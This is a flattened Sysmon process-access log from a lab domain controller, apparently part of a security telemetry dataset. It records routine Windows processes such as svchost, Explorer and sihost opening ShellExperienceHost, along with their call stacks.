09:21:47.962{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.962{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D29-6151-8D00-00000000FD01}41364220C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D29-6151-8D00-00000000FD01}41364220C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7abb|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7abb|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7abb|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f23cc|C:\Windows\System32\TwinUI.dll+b2d24|C:\Windows\System32\TwinUI.dll+aea6b|C:\Windows\System32\TwinUI.dll+cecda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.946{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.931{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.931{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.931{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.931{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 